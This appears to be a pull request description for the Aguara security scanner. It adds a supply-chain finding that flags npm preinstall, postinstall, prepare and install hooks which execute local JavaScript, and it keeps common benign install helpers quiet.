A package can declare a lifecycle script like `preinstall` or `postinstall`. That script runs automatically during install, before the application ever starts. In recent incidents, this is where the attacker's first-stage code begins.

Aguara now reports npm install-time execution of local JavaScript as a supply-chain risk.

Examples:

- `preinstall: node index.js`
- `postinstall: node ./scripts/setup.mjs`
- `prepare: node -e ...`
- `install: bun run setup`

## Why it matters

This gives users a clearer signal when a dependency is able to execute its own code during install.

For teams reviewing a package, a lockfile, or a repo before install, this helps answer a simple question:

"Will this dependency run code as soon as I install it?"

That is a different risk from ordinary build or test scripts, and it should be labeled as supply-chain behavior.

## What changed

- Adds a dedicated supply-chain finding for npm lifecycle hooks that execute local JavaScript.
- Keeps ordinary `build` and `test` scripts out of scope.
- Keeps common benign install helpers quiet, including `husky install`, `npx only-allow pnpm`, and `node --version`.
- Prevents npm `package.json` lifecycle hooks from being mislabeled as MCP manifest tampering.
- Keeps MCP manifest tampering detection active for non-npm manifests.

## Validation

- `make build`
- `make test`
- `make vet`
- `make lint`
